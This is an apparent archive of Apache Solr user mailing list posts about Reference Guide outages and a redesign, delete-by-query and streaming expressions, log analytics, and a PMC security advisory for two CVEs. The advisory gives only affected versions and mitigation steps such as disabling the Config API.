Re: Apache Solr Reference Guide isn't accessible

2021-02-02 Thread Cassandra Targett
Did you file an issue for this error?
On Feb 2, 2021, 1:31 AM -0600, Bernd Fehling , 
wrote:
> Yeah, but guide 8.8 is still buggy.
>
> As I reported a month ago, "ICU Normalizer 2 Filter" states:
> - NFC: ... Normalization Form C, canonical decomposition
> - NFD: ... Normalization Form D, canonical decomposition, followed by 
> canonical composition
> - NFKC: ... Normalization Form KC, compatibility decomposition
> - NFKD: ... Normalization Form KD, compatibility decomposition, followed by 
> canonical composition
>
> But the link to "Unicode Standard Annex #15" right above says:
> - NFC: ... Normalization Form C, Canonical Decomposition, followed by 
> Canonical Composition
> - NFD: ... Normalization Form D, Canonical Decomposition
> - NFKC: ... Normalization Form KC, Compatibility Decomposition, followed by 
> Canonical Composition
> - NFKD: ... Normalization Form KD, Compatibility Decomposition
>
> But, well who cares.
>
> Have a nice day.
>
>
> Am 01.02.21 um 23:04 schrieb Cassandra Targett:
> > The problem causing this has been fixed and the docs should be available 
> > again.
> > On Feb 1, 2021, 2:15 PM -0600, Alexandre Rafalovitch , 
> > wrote:
> > > And if you need something more recent while this is being fixed, you
> > > can look right at the source in GitHub, though a navigation, etc is
> > > missing:
> > > https://github.com/apache/lucene-solr/blob/master/solr/solr-ref-guide/src/analyzers.adoc
> > >
> > > Open Source :-)
> > >
> > > Regards,
> > > Alex.
> > >
> > > On Mon, 1 Feb 2021 at 15:04, Mike Drob  wrote:
> > > >
> > > > Hi Dorion,
> > > >
> > > > We are currently working with our infra team to get these restored. In 
> > > > the
> > > > meantime, the 8.4 guide is still available at
> > > > https://lucene.apache.org/solr/guide/8_4/ and are hopeful that the 8.8
> > > > guide will be back up soon. Thank you for your patience.
> > > >
> > > > Mike
> > > >
> > > > On Mon, Feb 1, 2021 at 1:58 PM Dorion Caroline 
> > > > 
> > > > wrote:
> > > >
> > > > > Hi,
> > > > >
> > > > > I can't access to Apache Solr Reference Guide since few days.
> > > > > Example:
> > > > > URL
> > > > >
> > > > > * https://lucene.apache.org/solr/guide/8_8/
> > > > > * https://lucene.apache.org/solr/guide/8_7/
> > > > > Result:
> > > > > Not Found
> > > > > The requested URL was not found on this server.
> > > > >
> > > > > Do you know what going on?
> > > > >
> > > > > Thanks
> > > > > Caroline Dorion
> > > > >
> >


Re: Apache Solr Reference Guide isn't accessible

2021-02-01 Thread Cassandra Targett
The problem causing this has been fixed and the docs should be available again.
On Feb 1, 2021, 2:15 PM -0600, Alexandre Rafalovitch , 
wrote:
> And if you need something more recent while this is being fixed, you
> can look right at the source in GitHub, though a navigation, etc is
> missing:
> https://github.com/apache/lucene-solr/blob/master/solr/solr-ref-guide/src/analyzers.adoc
>
> Open Source :-)
>
> Regards,
> Alex.
>
> On Mon, 1 Feb 2021 at 15:04, Mike Drob  wrote:
> >
> > Hi Dorion,
> >
> > We are currently working with our infra team to get these restored. In the
> > meantime, the 8.4 guide is still available at
> > https://lucene.apache.org/solr/guide/8_4/ and are hopeful that the 8.8
> > guide will be back up soon. Thank you for your patience.
> >
> > Mike
> >
> > On Mon, Feb 1, 2021 at 1:58 PM Dorion Caroline 
> > 
> > wrote:
> >
> > > Hi,
> > >
> > > I can't access to Apache Solr Reference Guide since few days.
> > > Example:
> > > URL
> > >
> > > * https://lucene.apache.org/solr/guide/8_8/
> > > * https://lucene.apache.org/solr/guide/8_7/
> > > Result:
> > > Not Found
> > > The requested URL was not found on this server.
> > >
> > > Do you know what going on?
> > >
> > > Thanks
> > > Caroline Dorion
> > >


Re: Is the lucene.apache.org link dead?

2021-02-01 Thread Cassandra Targett
This problem has been fixed and docs should be available again. Please let us 
know if you still have problems accessing anything.
On Feb 1, 2021, 8:32 AM -0600, Cassandra Targett , wrote:
> There were some issues while publishing the various bits for 8.8 and Lucene 
> and Solr Javadocs and Ref Guides for 8.5-8.7 are currently missing. The 
> project is working on getting those versions back as soon as possible.
>
> We apologize for this situation, hopefully it won’t be too long today before 
> we have it fixed.
> On Feb 1, 2021, 3:33 AM -0600, Atita Arora , wrote:
> > True the link is down since last week, I checked as we are currently in the
> > state of migration to 8.7 too.
> >
> >
> > On Mon, Feb 1, 2021 at 6:57 AM Taisuke Miyazaki 
> > wrote:
> >
> > > Hi,
> > > I tried to open the Solr News page to check the contents of the solr
> > > release, but it seems to get Not Found.
> > > I think it's either the wrong link or the link is messed up.
> > > If there is a problem, do you think you can fix it?
> > >
> > > Sorry if this has already been discussed somewhere.
> > >
> > > Solr News Page: https://lucene.apache.org/solr/news.html
> > > Dead LInk: https://lucene.apache.org/solr/8_7_0/changes/Changes.html
> > >
> > > Thank you.
> > > Taisuke.
> > >


Re: Is the lucene.apache.org link dead?

2021-02-01 Thread Cassandra Targett
There were some issues while publishing the various bits for 8.8 and Lucene and 
Solr Javadocs and Ref Guides for 8.5-8.7 are currently missing. The project is 
working on getting those versions back as soon as possible.

We apologize for this situation, hopefully it won’t be too long today before we 
have it fixed.
On Feb 1, 2021, 3:33 AM -0600, Atita Arora , wrote:
> True the link is down since last week, I checked as we are currently in the
> state of migration to 8.7 too.
>
>
> On Mon, Feb 1, 2021 at 6:57 AM Taisuke Miyazaki 
> wrote:
>
> > Hi,
> > I tried to open the Solr News page to check the contents of the solr
> > release, but it seems to get Not Found.
> > I think it's either the wrong link or the link is messed up.
> > If there is a problem, do you think you can fix it?
> >
> > Sorry if this has already been discussed somewhere.
> >
> > Solr News Page: https://lucene.apache.org/solr/news.html
> > Dead LInk: https://lucene.apache.org/solr/8_7_0/changes/Changes.html
> >
> > Thank you.
> > Taisuke.
> >


Re: Analytics for Solr logs

2020-10-14 Thread Cassandra Targett
While the tool is only included in 8.5 and higher, it will index logs from any 
version of Solr 7.x or 8.x (and possibly even 6.x). So if you want to use it, 
you could download Solr 8.5 or higher to your local machine and index your 
8.4.1 logs there, or use an 8.5 or higher Docker image. You probably need to 
copy them locally; AFAIK, it can't take a URL to go get files from a non-local 
filestore like S3, etc.

I use it at least weekly in my work…it’s an immense help to troubleshooting 
when you aren’t sure what’s going on with the system.
On Oct 14, 2020, 3:50 AM -0500, Zisis T. , wrote:
> Thanks Alexandre, silly me. I though 8.4.1 was recent enough...
>
>
>
> --
> Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Vulnerabilities in SOLR 8.6.2

2020-09-29 Thread Cassandra Targett
Solr follows the ASF policy for reporting vulnerabilities, described in this 
page on our website: https://lucene.apache.org/solr/security.html. This page 
also lists known vulnerabilities that have been addressed, with their 
mitigation steps.

Scanning tools are commonly full of false positives so for this reason the 
community does not accept the unfiltered scanner output such as a spreadsheet 
as a vulnerability report.

We attempt to maintain a list of known false positives (also linked from the 
website) at: 
https://cwiki.apache.org/confluence/display/SOLR/SolrSecurity#SolrSecurity-SolrandVulnerabilityScanningTools.
 But in all honestly such a list is really hard to keep up with. Exact versions 
in your report may differ from what’s on the list, but usually the general 
conclusion that it’s not an exploitable issue remains. For example, our list 
notes a CVE for ‘dom4j-1.6.1.jar' is not an exploitable vulnerability because 
it is only used in tests. If a CVE comes out for ‘dom4j-1.7.3.jar’ (if such a 
version exists), the fact remains that the dependency is only used in tests and 
is still not exploitable in a production system.

If you do find a real vulnerability you are concerned about, ASF policy is for 
you to privately report it to the community so it can be addressed before 
hackers have a chance to attempt to exploit user systems. How to do that is 
also described in the Security page in our website linked above.

-Cassandra
On Sep 28, 2020, 2:07 PM -0500, Narayanan, Lakshmi 
, wrote:
> Hello Solr-User Support team
> We have installed the SOLR 8.6.2 package into docker container in our DEV 
> environment. Prior to using it, our security team scanned the docker image 
> using SysDig and found a lot of Critical/High/Medium vulnerabilities. The 
> full list is in the attached spreadsheet
>
> Scan Summary
> 30 STOPS 190 WARNS    188 Vulnerabilities
>
> Please advise or point us to how/where to get a package that has been patched 
> for the Critical/High/Medium vulnerabilities in the attached spreadsheet
> Your help will be gratefully received
>
>
> Lakshmi Narayanan
> Marsh & McLennan Companies
> 121 River Street, Hoboken,NJ-07030
> 201-284-3345
> M: 845-300-3809
> Email: lakshmi.naraya...@mmc.com
>
>
>
>
>
> **
> This e-mail, including any attachments that accompany it, may contain
> information that is confidential or privileged. This e-mail is
> intended solely for the use of the individual(s) to whom it was intended to be
> addressed. If you have received this e-mail and are not an intended recipient,
> any disclosure, distribution, copying or other use or
> retention of this email or information contained within it are prohibited.
> If you have received this email in error, please immediately
> reply to the sender via e-mail and also permanently
> delete all copies of the original message together with any of its attachments
> from your computer or device.
> **


Re: Solr Deletes

2020-05-29 Thread Cassandra Targett
I’m coming in a little late, but as of 8.5 there is a new streaming expression 
designed for DBQ situations which basically does what Erick was suggesting - 
gets a list of IDs for a query then does a delete by ID: 
https://lucene.apache.org/solr/guide/8_5/stream-decorator-reference.html#delete.

It won’t help if you’re not on 8.5, but going forward will be a good option for 
large delete sets.
On May 26, 2020, 8:09 PM -0500, Dwane Hall , wrote:
> Thank you very much Erick, Emir, and Bram this is extremly useful advice I 
> sincerely appreciate everyone’s input!
>
>
> Before I received your responses I ran a controlled DBQ test in our DR 
> environment and exactly what you said occurred. It was like reading a step by 
> step playbook of events with heavy blocking occurring on the Solr nodes and 
> lots of threads going into a TIMED_WAITING state. Several shards were pushed 
> into recovery mode and things were starting to get ugly, fast!
>
>
> I'd read snippets in blog posts and JIRA tickets on DBQ being a blocking 
> operation but I did not expect having such a specific DBQ (i.e. by ID's) 
> would operate very differently from the DBID (which I expected block as 
> well). Boy was I wrong! They're used interchangeably in the Solr ref guide 
> examples so it’s very useful to understand the performance implications of 
> each. Additionally all of the information I found on delete operations never 
> mentioned query performance so I was unsure of its impact in this dimension.
>
>
> Erik thanks again for your comprehensive response your blogs and user group 
> responses are always a pleasure to read I'm constantly picking useful pieces 
> of information that I use on a daily basis in managing our Solr/Fusion 
> clusters. Additionally, I've been looking for an excuse to use streaming 
> expressions and I did not think to use them the way you suggested. I've 
> watched quite a few of Joel's presentations on youtube and his blog is 
> brilliant. Streaming expressions are expanding with every Solr release they 
> really are a very exciting part of Solr's evolution. Your final point on 
> searcher state while streaming expressions are running and its relationship 
> with new searchers is a very interesting additional piece of information I’ll 
> add to the toolbox. Thank you.
>
>
>
> At the moment we're fortunate to have all the ID's of the documents to remove 
> in a DB so I'll be able to construct batches of DBID requests relatively 
> easily and store them in a backlog table for processing without needing to 
> traverse Solr with cursors, streaming (or other means) to identify them. We 
> follow a similar approach for updates in batches of around ~1000 docs/batch. 
> Inspiration for that sweet spot was once again determined after reading one 
> of Erik's Lucidworks blog posts and testing 
> (https://lucidworks.com/post/really-batch-updates-solr-2/).
>
>
>
> Again thanks to the community and users for everyone’s contribution on the 
> issue it is very much appreciated.
>
>
> Successful Solr-ing to all,
>
>
> Dwane
>
> 
> From: Bram Van Dam 
> Sent: Wednesday, 27 May 2020 5:34 AM
> To: solr-user@lucene.apache.org 
> Subject: Re: Solr Deletes
>
> On 26/05/2020 14:07, Erick Erickson wrote:
> > So best practice is to go ahead and use delete-by-id.
>
>
> I've noticed that this can cause issues when using implicit routing, at
> least on 7.x. Though I can't quite remember whether the issue was a
> performance issue, or whether documents would sometimes not get deleted.
>
> In either case, I worked it around it by doing something like this:
>
> UpdateRequest req = new UpdateRequest();
> req.deleteById(id);
> req.setCommitWithin(-1);
> req.setParam(ShardParams._ROUTE_, shard);
>
> Maybe that'll help if you run into either of those issues.
>
> - Bram


Re: Solr Ref Guide Redesign coming in 8.6

2020-04-29 Thread Cassandra Targett
> This design still has a minor annoyance that I have noted in the past:
> in the table of contents pane it is easy to open a subtree, but the
> only way to close it is to open another one. Obviously not a big
> deal.

Thanks for pointing that out, it helped me find a big problem which was that I 
used the wrong build of JQuery to support using the caret to open/close the 
subtree. It should work now to open a subtree independently of clicking the 
heading, and should also close the tree.
> I'll probably spend too much time researching how to widen the
> razor-thin scrollbar in the TOC panel, since it seems to be
> independent of the way I spent too much time fixing the browser's own
> inadequate scrollbar width. :-) Also, the thumb's color is so close to
> the surrounding color that it's really hard to see. And for some
> reason when I use the mouse wheel to scroll the TOC, when it gets to
> the top or the bottom the content pane starts scrolling instead, which
> is surprising and mildly inconvenient. Final picky point: the
> scrolling is *very* insensitive -- takes a lot of wheel motion to move
> the panel just a bit.

I’m not totally following all of this, but if I assume you mean the left 
sidebar navigation (and not an in-page TOC) then my answer to at least part of 
it is to pare down the list of top-level topics so you don’t have to scroll it 
at all and then the only scrolling you need to do is for the content itself. 
That’s what I want to do in Phase 2, so there are several things in the 
behavior of the sidebar I’m purposely ignoring for now. Some will go away with 
a new organization and new things will be introduced that will need to be 
fixed, so to save myself some time I’m waiting to fix all of it at once.


Re: Solr Ref Guide Redesign coming in 8.6

2020-04-29 Thread Cassandra Targett
To respond to the feedback so far:

Version picker: This is more complex than it may be initially assumed
because of the way we publish the site. Since we use a static site
generator, each page is a standalone HTML file. To add a version picker to
an older version that includes all the latest versions, we'd need to
republish all the older versions every time we published a new one. We
could get around this by pointing a version picker to a location we update
each time (but still today would need to republish all the older versions
to add it at all), which was harder to do in the past due to how the Solr
website as a whole was published. I wanted to try to address this problem
in what I'm calling Phase 3 - moving to a different static site generator
that supports multiple versions in a more native way but maybe I can find a
simple stopgap until then.

Jumpiness while hovering over nav items: The font size isn't actually
different when you hover or select a nav item, it's just bolded which makes
it overrun the allotted space and wrap. I made it bolded in response to
other feedback I got earlier on that there was not enough differentiation
between selected and not-selected items but didn't notice the jumpiness (I
had to make my screen quite large to duplicate it, and when I looked at the
Guide on larger screens earlier I was usually looking at some other problem
and just didn't notice). I'll play with it a little and find another way to
differentiate the items without bolding them.

Thanks for your comments so far!

On Wed, Apr 29, 2020 at 2:56 AM Colvin Cowie 
wrote:

> In addition to those points, I think it generally does look good but the
> thing I've noticed is that increase in text size on rollover in the menu
> makes it quite jumpy:
> https://drive.google.com/open?id=15EF0T_C_l8OIDuW8QHOFunL4VzxtyVyb
>
> On Wed, 29 Apr 2020 at 08:15, Bernd Fehling <
> bernd.fehl...@uni-bielefeld.de>
> wrote:
>
> > +1
> >
> > And a fully indexed search for the Ref Guide.
> > I have to use Google to search for infos in Ref Guide of a search engine.
> > :-(
> >
> >
> > Am 29.04.20 um 02:11 schrieb matthew sporleder:
> > > I highly recommend a version selector in the header!  I am *always*
> > > landing on 6.x docs from google.
> > >
> > > On Tue, Apr 28, 2020 at 5:18 PM Cassandra Targett  >
> > wrote:
> > >>
> > >> In case the list breaks the URL to view the Jenkins build, here's a
> > shorter
> > >> URL:
> > >>
> > >> https://s.apache.org/df7ew.
> > >>
> > >> On Tue, Apr 28, 2020 at 3:12 PM Cassandra Targett <
> ctarg...@apache.org>
> > >> wrote:
> > >>
> > >>> The PMC would like to engage the Solr user community for feedback on
> an
> > >>> extensive redesign of the Solr Reference Guide I've just committed to
> > the
> > >>> master (future 9.0) branch.
> > >>>
> > >>> You can see the new design from our Jenkins build of master:
> > >>>
> > >>>
> >
> https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-master/javadoc/
> > >>>
> > >>> The hope is that you will receive these changes positively. If so,
> > we'll
> > >>> use this for the upcoming 8.6 Ref Guide and future releases. We also
> > may
> > >>> re-publish earlier 8.x versions so they use this design.
> > >>>
> > >>> I embarked on this project last December simply as an attempt to
> > upgrade
> > >>> the version of Bootstrap used by the Guide. After a couple of days,
> I'd
> > >>> changed the layout entirely. In the ensuing few months I've tried to
> > iron
> > >>> out the kinks and made some extensive changes to the "backend" (the
> > CSS,
> > >>> JavaScript, etc.).
> > >>>
> > >>> I'm no graphic designer, but some of my guiding thoughts were to try
> to
> > >>> make full use of the browser window, improve responsiveness for
> > different
> > >>> sized screens, and just give it a more modern feel. The full list of
> > what
> > >>> has changed is detailed in the Jira issue if you are interested:
> > >>> https://issues.apache.org/jira/browse/SOLR-14173
> > >>>
> > >>> This is Phase 1 of several changes. There is one glaring remaining
> > issue,
> > >>> which is that our list of top-level categories is too long for the
> new
> > >>> design. I've punted fixing that to Phase 2, which will be an
> extensive
> > >>> re-consideration of how the Ref Guide is organized with the goal of
> > >>> trimming down the top-level categories to only 4-6. SOLR-1 will
> > track
> > >>> phase 2.
> > >>>
> > >>> One last thing to note: this redesign really only changes the
> > presentation
> > >>> of the pages and some of the framework under the hood - it doesn't
> yet
> > add
> > >>> full-text search. All of the obstacles to providing search still
> > exist, but
> > >>> please know that we fully understand frustration on this point and
> > still
> > >>> hope to fix it.
> > >>>
> > >>> I look forward to hearing your feedback in this thread.
> > >>>
> > >>> Best,
> > >>> Cassandra
> > >>>
> >
>


Re: Solr Ref Guide Redesign coming in 8.6

2020-04-28 Thread Cassandra Targett
In case the list breaks the URL to view the Jenkins build, here's a shorter
URL:

https://s.apache.org/df7ew.

On Tue, Apr 28, 2020 at 3:12 PM Cassandra Targett 
wrote:

> The PMC would like to engage the Solr user community for feedback on an
> extensive redesign of the Solr Reference Guide I've just committed to the
> master (future 9.0) branch.
>
> You can see the new design from our Jenkins build of master:
>
> https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-master/javadoc/
>
> The hope is that you will receive these changes positively. If so, we'll
> use this for the upcoming 8.6 Ref Guide and future releases. We also may
> re-publish earlier 8.x versions so they use this design.
>
> I embarked on this project last December simply as an attempt to upgrade
> the version of Bootstrap used by the Guide. After a couple of days, I'd
> changed the layout entirely. In the ensuing few months I've tried to iron
> out the kinks and made some extensive changes to the "backend" (the CSS,
> JavaScript, etc.).
>
> I'm no graphic designer, but some of my guiding thoughts were to try to
> make full use of the browser window, improve responsiveness for different
> sized screens, and just give it a more modern feel. The full list of what
> has changed is detailed in the Jira issue if you are interested:
> https://issues.apache.org/jira/browse/SOLR-14173
>
> This is Phase 1 of several changes. There is one glaring remaining issue,
> which is that our list of top-level categories is too long for the new
> design. I've punted fixing that to Phase 2, which will be an extensive
> re-consideration of how the Ref Guide is organized with the goal of
> trimming down the top-level categories to only 4-6. SOLR-1 will track
> phase 2.
>
> One last thing to note: this redesign really only changes the presentation
> of the pages and some of the framework under the hood - it doesn't yet add
> full-text search. All of the obstacles to providing search still exist, but
> please know that we fully understand frustration on this point and still
> hope to fix it.
>
> I look forward to hearing your feedback in this thread.
>
> Best,
> Cassandra
>


Solr Ref Guide Redesign coming in 8.6

2020-04-28 Thread Cassandra Targett
The PMC would like to engage the Solr user community for feedback on an
extensive redesign of the Solr Reference Guide I've just committed to the
master (future 9.0) branch.

You can see the new design from our Jenkins build of master:
https://builds.apache.org/view/L/view/Lucene/job/Solr-reference-guide-master/javadoc/

The hope is that you will receive these changes positively. If so, we'll
use this for the upcoming 8.6 Ref Guide and future releases. We also may
re-publish earlier 8.x versions so they use this design.

I embarked on this project last December simply as an attempt to upgrade
the version of Bootstrap used by the Guide. After a couple of days, I'd
changed the layout entirely. In the ensuing few months I've tried to iron
out the kinks and made some extensive changes to the "backend" (the CSS,
JavaScript, etc.).

I'm no graphic designer, but some of my guiding thoughts were to try to
make full use of the browser window, improve responsiveness for different
sized screens, and just give it a more modern feel. The full list of what
has changed is detailed in the Jira issue if you are interested:
https://issues.apache.org/jira/browse/SOLR-14173

This is Phase 1 of several changes. There is one glaring remaining issue,
which is that our list of top-level categories is too long for the new
design. I've punted fixing that to Phase 2, which will be an extensive
re-consideration of how the Ref Guide is organized with the goal of
trimming down the top-level categories to only 4-6. SOLR-1 will track
phase 2.

One last thing to note: this redesign really only changes the presentation
of the pages and some of the framework under the hood - it doesn't yet add
full-text search. All of the obstacles to providing search still exist, but
please know that we fully understand frustration on this point and still
hope to fix it.

I look forward to hearing your feedback in this thread.

Best,
Cassandra


Re: Is Banana deprecated?

2020-04-21 Thread Cassandra Targett
Banana is a fork of a very old Kibana version (Kibana 3.x) developed by 
Lucidworks. It’s technically out of scope for this list, as the Solr community 
has nothing to do with maintaining it.

(Full disclosure, I work at Lucidworks. However, I’m on a different team and 
have no idea about Banana’s development cycle/roadmap.)

Personally, I think it’s fine for some use cases, but many users have had 
problems with queries bogging down their Solr instances and causing overall 
slowness. This is because behind every panel is a Solr query, so to draw every 
panel a new query is issued. If you have a complex dashboard with even 
semi-complex queries it adds load, possibly a lot of load. It might be fine for 
you, though, depending on what you use it for and how much data you are working 
with.

I will say there are more up-to-date Solr integrations actively maintained by 
the Solr community that may satisfy similar needs:

If you’re looking for something like log analytics, take a look at using 
streaming expressions for this: 
https://github.com/apache/lucene-solr/blob/visual-guide/solr/solr-ref-guide/src/logs.adoc.
 This approach can be adapted for whatever kind of data you have and want to 
visualize.

If you want to track metrics, integrating with something like Prometheus & 
Grafana might be better: 
https://lucene.apache.org/solr/guide/monitoring-solr-with-prometheus-and-grafana.html.

Hope it helps -
Cassandra
On Apr 16, 2020, 6:41 PM -0500, S G , wrote:
> Hello,
>
> I still see releases happening on it:
> https://github.com/lucidworks/banana/pull/355
>
> So it is something recommended to be used for production?
>
> Regards,
> SG


PMC update on Solr vulnerabilities: CVEs 2019-12409 and 2019-17558

2019-11-29 Thread Cassandra Targett
Some of you may have seen an article earlier this week by ZDNet describing
two vulnerabilities in Apache Solr that have also been published elsewhere.
The Lucene PMC would like to update our user community about what we have
done and are doing to address the two issues.

The first issue noted, CVE-2019-12409, was announced a couple of weeks ago
and exists in Solr 8.1.1-8.2.0. This issue was caused by a bad default
option in the ‘solr.in.sh' configuration file to allow remote JMX
connections by default and can be mitigated by changing the setting. More
details are in the mailing list announcement here:
https://s.apache.org/98nsn. Solr 8.3.0 properly sets the correct default
option.

The second issue allows Remote Code Execution through custom Velocity
templates. This issue now has a CVE: 2019-17558. It affects versions 7.0.0
through 8.3.0.

Solr is working on an 8.3.1 release to fix this bug; we are voting on a
release candidate now and it should be released by early next week. We will
make a formal announcement about it and update the CVE databases when 8.3.1
is released. We will likely also release a 7.7.3 for users still on 7.x,
but have not initiated that release process yet.

This vulnerability is only available to attackers if these conditions are
in place:

1. You have not disabled the Config API, or do not restrict access to the
Config API via authentication/authorization settings
2. You allow connections to Solr APIs from outside your firewall

You can mitigate this vulnerability right now by setting the system
parameter “-Ddisable.configEdit=true” and restarting Solr. If you already
have secured Solr behind a firewall and you have authentication for all
users in place, then we believe your risk of this bug is very low. If you
don’t use the Config API, we’d recommend disabling it even if you have a
firewall and authentication in place.

In future releases, we plan to minimize the set of enabled, pre-configured
plugins in Solr's default configset. This will not only reduce security
risks but will also be a simplification. A new plugin management system is
coming soon, and we will look to use that as much as possible to make Solr
as secure as possible out of the box.

We'd like to make sure everyone is aware of the wiki page that the PMC
maintains about known vulnerabilities:
https://cwiki.apache.org/confluence/display/solr/SolrSecurity. This page
provides a straightforward way to know what vulnerabilities have been
discovered to date, if your version is impacted, and how to mitigate your
risks.

Now is also a great time to take a few moments to review how you have
secured your Solr installation. You should always put Solr behind a
firewall, require SSL, and implement authentication for all users at a
minimum. These steps make any attack more difficult to execute.
Historically, there have been very few vulnerabilities reported to Solr
that did not first require a bad actor to have unauthorized access to the
system. As with any system, adopting a defense-in-depth approach to
securing Solr is a best practice. Be sure to refer to the Solr Reference
Guide section for more details about available configuration options:
https://lucene.apache.org/solr/guide/securing-solr.html.

If you have questions about securing Solr after reviewing available
information and documentation, please feel free to ask a question on this
mailing list and we will work to get you a response as quickly as we can.
To report a suspected vulnerability, please email secur...@lucene.apache.org
.

Best Regards,
The Lucene PMC


Re: [ANNOUNCE] Apache Solr 8.3.0 released

2019-11-05 Thread Cassandra Targett
We’re still working out the changes to the publication process, and got a 
couple wires crossed that prevented the Ref Guide from being published at the 
same time for this release.

I’ve published the final version now: http://lucene.apache.org/solr/guide/8_3/.

Apologies for the confusion, by the next release we expect to have all this 
worked out.
On Nov 4, 2019, 2:30 AM -0600, Paras Lehana , wrote:
> Hey Ishan,
>
> Somedays back it was announced that the foundation will majorly focus on
> HTML guides now and thus, 8.2 guide was released (which was said to be
> shorter than 8.0). C*an we expect Ref Guide 8.3 in coming days* or maybe is
> it not required? Asking because we are planning to upgrade to latest stable
> Solr versions and to keep us updated all times, we will be referring the
> latest guides and incorporated changes in each release.
>
> On Sun, 3 Nov 2019 at 04:34, Ishan Chattopadhyaya 
> wrote:
>
> > ## 2 November 2019, Apache Solr™ 8.3.0 available
> >
> > The Lucene PMC is pleased to announce the release of Apache Solr 8.3.0.
> >
> > Solr is the popular, blazing fast, open source NoSQL search platform
> > from the Apache Lucene project. Its major features include powerful
> > full-text search, hit highlighting, faceted search, dynamic
> > clustering, database integration, rich document handling, and
> > geospatial search. Solr is highly scalable, providing fault tolerant
> > distributed search and indexing, and powers the search and navigation
> > features of many of the world's largest internet sites.
> >
> > Solr 8.3.0 is available for immediate download at:
> >
> > 
> >
> > ### Solr 8.3.0 Release Highlights:
> >
> > *Two dimensional routed aliases are now available for organizing
> > collections based on the data values of two fields
> > *SPLITSHARD implements a new splitByPrefix option that takes into
> > account the actual document distribution when using compositeIds
> > *QueryElevationComponent can have query rules configured with
> > match="subset" wherein the words need only match a subset of the
> > query's words and in any order
> > *Command line option to export documents to a file
> > *Support deterministic replica routing preferences for better cache usage
> > *Ability to query aliases in Solr Admin UI
> > *JWTAuthPlugin supports multiple JWKS endpoints and multiple IdP issuers
> > *JSON faceting now supports arbitrary ranges for range facets
> > *Support integral plots, cosine distance and string truncation with
> > math expressions (Joel Bernstein)
> > *New cat() stream source to create tuples from lines in local files
> > *Add upper, lower, trim and split Stream Evaluators
> > *Add CsvStream, TsvStream Streaming Expressions and supporting
> > Stream Evaluators
> > *Add CaffeineCache, an efficient implementation of SolrCache
> > *Live SPLITSHARD can lose updates due to cluster state change
> > between checking if the current shard is active and later checking if
> > there are any sub-shard leaders to forward the update to
> > *Fix for SPLITSHARD (async) with failures in underlying
> > sub-operations can result in data loss
> > *Allow dynamic resizing of SolrCache-s
> > *Allow optional redaction of data saved by 'bin/solr autoscaling -save'
> > *Optimized large managed schema modifications (internal O(n^2) problem)
> > *Max idle time support for SolrCache implementations
> > *Add Prometheus Exporter GC and Heap options
> > *SSL: Adding Enabling/Disabling client's hostname verification config
> > *Introducing SolrClient.ping(collection) in SolrJ
> > *Fix for CDCR bootstrap not replicating index to the replicas of
> > target cluster
> > *Fixed a race condition when initializing metrics for new security
> > plugins on security.json change
> > *Fixed JWTAuthPlugin to update metrics prior to continuing w/other
> > filters or returning error
> > *Fixed distributed grouping when multiple 'fl' params are specified
> > *JMX MBeans are not exposed because of race condition between
> > creating platform mbean server and registering mbeans
> > *Fix for class-cast issues during atomic-update 'removeregex' operations
> > *Fix for multi-node race condition to create/remove nodeLost markers
> > *Fix for too many cascading calls to remote servers, which can bring
> > down nodes
> > *Fix for MOVEREPLICA ignoring replica type and always adding 'nrt'
> > replicas
> > *Fix: DistributedZkUpdateProcessor should propagate URP.finish()
> > lifecycle (regression since 8.1)
> >
> >
> > Please read CHANGES.txt for a full list of new features and changes:
> >
> > 
> >
> > Solr 8.3.0 also includes features, optimizations and bugfixes in the
> > corresponding Apache Lucene release:
> >
> > 
> >
> >
> > Note: The Apache Software Foundation uses an extensive mirroring network
> > for
> > distributing releases. It is possible that the mirror you 

Re: ant precommit fails on .adoc files

2019-10-30 Thread Cassandra Targett
On Oct 29, 2019, 10:44 AM -0500, Shawn Heisey , wrote:
>
> I tried once to build a Solr package on Windows. It didn't work,
> requiring tools that are not normally found on Windows. What I found
> for this thread seems to indicate that the source validation for the ref
> guide does not work correctly either. I would be interested in finding
> out whether or not we expect the build system to work right on Windows.
> I suspect that it is not supported.
>

Just to be clear, the error from the original poster was thrown from the 
‘validate-source-patterns’ task, which is a dependency of the ‘validate’ task 
of precommit and doesn’t use the Ref Guide tooling. It just happened to dislike 
something it found in a file that happens to be used for the Ref Guide.

Ref Guide validation, where the Ref Guide tooling is used, happens in the 
‘documentation’ task so the culprit here is more likely the Rat tooling that’s 
used to validate all source files.

Cassandra


Solr Ref Guide Changes - now HTML only

2019-10-28 Thread Cassandra Targett
Hi all -

Some have already noticed this change, but to state it formally, as of 8.2,
the Lucene PMC will no longer treat the PDF version of the Solr
Reference Guide as the primary format, and we will no longer release a PDF
version. The Guide will now be available online only.

Some of you may prefer the PDF and will be disappointed by this change. To
explain, there are several reasons why we're doing this:

1. We believe that most in our community rely on the HTML version (at
https://lucene.apache.org/solr/guide), but since our release focus has been
the PDF version, we are not spending time making sure the HTML works as
well as it should and could.
2. The PDF has grown far too large. The 8.1 version is 1,483 pages, and
16Mb. Attempting to cut it back would be complex, and, considering it is a
less effective medium, possibly not worth the effort.
3. The release process held us back from getting the Guide out at the same
time as the artifact release (which is what has happened so far with 8.x
versions of the Guide).
4. Focusing on supporting the PDF first holds us back from several things
we would like to do in the HTML for better content presentation (including
easy-to-maintain architecture diagrams, proper formatting of math formulas,
and more complete language examples, among other things).

So, starting with 8.2 we are making a few changes:

1. The 8.2 version of the Ref Guide has been published in HTML form only (
https://lucene.apache.org/solr/guide/8_2/), and a PDF will not be available.
2. When 8.3 is released (soon), the HTML version will be available online
at the same time, and will be announced together.
3. For those who follow the development list, starting with 8.3 and going
forward a DRAFT version of the Guide will be available online as soon as a
Lucene & Solr release candidate is prepared and a VOTE thread has started.

If you are someone who wishes the PDF would continue, please share your
feedback. While the PDF is not sustainable in its current form - there are
pending changes that will break our current tooling entirely - we could see
if it's possible to find alternate ways to satisfy the same use cases.

Thanks to all of you for your continued support of Lucene and Solr, and we
look forward to making substantial improvements to the Guide in the months
to come.

Regards,
Cassandra


[ANNOUNCE] Apache Solr Reference Guide for 8.1 released

2019-06-18 Thread Cassandra Targett
The Lucene PMC is pleased to announce that the Solr Reference Guide for
Solr 8.1 is now available.

This 1,483 page PDF is the definitive guide to Apache Solr, the search
server built on Apache Lucene.

The PDF can be downloaded from:
https://www.apache.org/dyn/closer.cgi/lucene/solr/ref-guide/apache-solr-ref-guide-8.1.pdf

The Guide is also available online, at
